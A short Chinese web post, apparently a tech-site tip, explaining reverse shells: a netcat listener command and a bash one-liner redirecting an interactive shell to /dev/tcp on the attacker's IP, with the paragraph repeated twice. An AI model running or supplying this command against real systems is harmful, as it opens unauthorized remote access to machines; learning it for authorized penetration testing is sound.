【Reverse shell】也叫反弹shell,是渗透攻击的基本功,如果你找到机会让远端的机器执行你注入的代码,你的代码怎样才能为你生成一个可以交互操作的shell呢?
你可以在本地先用nc启动一个监听进程【nc -l 端口号】
然后在远端执行【bash -i >& /dev/tcp/你本地的IP/端口号 0>&1】即可。
【Reverse shell】也叫反弹shell,是渗透攻击的基本功,如果你找到机会让远端的机器执行你注入的代码,你的代码怎样才能为你生成一个可以交互操作的shell呢?
你可以在本地先用nc启动一个监听进程【nc -l 端口号】
然后在远端执行【bash -i >& /dev/tcp/你本地的IP/端口号 0>&1】即可。
本文由 @admin 于 2023-09-26 发布在 电脑报,如有疑问,请联系我们。
本文链接:https://www.shudoo.com/shudoo/43511.html